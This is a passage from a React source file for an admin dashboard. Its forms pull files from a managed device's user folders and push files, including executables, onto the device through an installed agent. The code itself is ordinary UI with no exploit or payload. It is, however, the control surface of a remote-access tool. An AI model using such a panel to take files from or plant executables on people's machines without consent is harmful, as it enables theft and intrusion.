      <InfoCard title="File Download" style={{ marginTop:16 }}>
        {device.user_home && (
          <div style={{ fontSize:11, color:'var(--muted)', marginBottom:8, fontFamily:'monospace' }}>
            Device path: {device.user_home}\
          </div>
        )}
        <form onSubmit={requestFile} style={{ display:'flex', gap:8, marginBottom:8 }}>
          <input value={filePath} onChange={e=>setFilePath(e.target.value)}
            placeholder={device.user_home ? `${device.user_home}\\Documents\\file.txt` : "C:\\Users\\John\\Documents\\file.txt"}
            style={{ ...inputStyle, flex:1, fontFamily:'monospace', fontSize:12 }} />
          <ActionBtn type="submit" disabled={fileStatus === 'requesting'}>
            {fileStatus === 'requesting' ? 'Requesting…' : 'Download'}
          </ActionBtn>
        </form>
        {fileStatus && fileStatus !== 'requesting' && (
          <div style={{ fontSize:12, color: fileStatus.startsWith('Error') ? 'var(--red)' :
            fileStatus.startsWith('Downloaded') ? '#22c55e' : 'var(--muted)' }}>
            {fileStatus}
            <button onClick={() => setFileStatus('')}
              style={{ marginLeft:8, fontSize:10, background:'transparent',
                border:'none', color:'var(--muted)', cursor:'pointer' }}>✕</button>
          </div>
        )}
      </InfoCard>

      {/* File Upload */}
      <InfoCard title="File Upload (Admin → Device)" style={{ marginTop:16 }}>
        {device.user_home && (
          <div style={{ fontSize:11, color:'var(--muted)', marginBottom:8, fontFamily:'monospace' }}>
            Device path: {device.user_home}\
          </div>
        )}
        <form onSubmit={sendFileToAgent} style={{ display:'flex', flexDirection:'column', gap:8 }}>
          <div style={{ display:'flex', gap:8, alignItems:'center' }}>
            <input type="file" onChange={e => setUploadFile(e.target.files[0])}
              style={{ flex:1, fontSize:12, color:'var(--text)' }} />
          </div>
          <div style={{ display:'flex', gap:8 }}>
            <input value={uploadTarget} onChange={e=>setUploadTarget(e.target.value)}
              placeholder={device.user_home ? `${device.user_home}\\Desktop\\file.exe` : "C:\\Users\\John\\Desktop\\file.exe"}
              style={{ ...inputStyle, flex:1, fontFamily:'monospace', fontSize:12 }} />
            <ActionBtn type="submit" disabled={uploadStatus === 'uploading' || !uploadFile || !uploadTarget.trim()}>
              {uploadStatus === 'uploading' ? 'Uploading…' : 'Upload'}
            </ActionBtn>
          </div>
        </form>
        {uploadStatus && uploadStatus !== 'uploading' && (
          <div style={{ fontSize:12, marginTop:6, color: uploadStatus.startsWith('Error') ? 'var(--red)' :
            uploadStatus.startsWith('Saved') ? '#22c55e' : 'var(--muted)' }}>
            {uploadStatus}
            <button onClick={() => setUploadStatus('')}
              style={{ marginLeft:8, fontSize:10, background:'transparent',
                border:'none', color:'var(--muted)', cursor:'pointer' }}>✕</button>
          </div>
        )}
      </InfoCard>
    </div>
  );
}


// ── Shared Components ────────────────────────────────────────────────────

function InfoCard({ title, children, style }) {
  return (
    <div style={{ background:'var(--surface)', border:'1px solid var(--border)',
                  borderRadius:'var(--radius)', padding:16, ...style }}>
      <div style={{ fontWeight:600, marginBottom:12, color:'var(--muted)',
                    textTransform:'uppercase', fontSize:11, letterSpacing:.5 }}>{title}</div>
      {children}
    </div>
  );
}

function Row({ k, v }) {
  return (
    <div style={{ display:'flex', justifyContent:'space-between', fontSize:12, marginBottom:4 }}>
      <span style={{ color:'var(--muted)' }}>{k}</span>
      <span style={{ maxWidth:'60%', textAlign:'right', wordBreak:'break-word' }}>{v || '—'}</span>
    </div>
  );
}

function Tag({ children }) {
  return <span style={{ fontSize:10, padding:'2px 6px', background:'var(--accent)20',
    color:'var(--accent)', borderRadius:4 }}>{children}</span>;
}

function ActionBtn({ children, onClick, danger, type, disabled }) {
  return (
    <button type={type||'button'} onClick={onClick} disabled={disabled} style={{
      padding:'8px 10px', border:'1px solid var(--border)', borderRadius:6,
      background: danger ? '#ef444422' : '#1a1d27',
      color: danger ? '#ef4444' : '#e2e8f0',
      cursor: disabled ? 'not-allowed' : 'pointer', fontSize:12, whiteSpace:'nowrap',
      position: 'relative', zIndex: 1,
    }}>{children}</button>
  );
}

function TabBtn({ children, active, onClick }) {
  return (
    <button onClick={onClick} style={{
      padding:'6px 12px', border:'none', fontSize:11, fontWeight: active ? 600 : 400,
      background: active ? 'var(--accent)' : 'transparent',
      color: active ? '#fff' : 'var(--muted)', cursor:'pointer',
    }}>{children}</button>
  );
}

function Input({ label, value, onChange, placeholder }) {
  return (
    <div style={{ marginBottom:10 }}>
      <label style={{ display:'block', fontSize:11, color:'var(--muted)', marginBottom:4 }}>{label}</label>
      <input value={value} onChange={e=>onChange(e.target.value)} placeholder={placeholder}
        style={inputStyle} />
    </div>
  );
}

const inputStyle = {
  display:'block', width:'100%', padding:'8px 10px',
  background:'var(--bg)', border:'1px solid var(--border)', borderRadius:6,
  color:'var(--text)', fontSize:13, boxSizing:'border-box',
};

const navCardStyle = {
  display:'block', padding:'14px 16px', background:'var(--surface)',
  border:'1px solid var(--border)', borderRadius:'var(--radius)',
  textAlign:'center', fontWeight:600, color:'var(--text)',
  transition:'border-color .15s',
};

const termStyle = {
  background:'#0d1117', border:'1px solid var(--border)', borderRadius:6,
  padding:10, fontFamily:'monospace', fontSize:12, maxHeight:400,
  overflowY:'auto', whiteSpace:'pre-wrap', wordBreak:'break-all',
  color:'#c9d1d9',
};
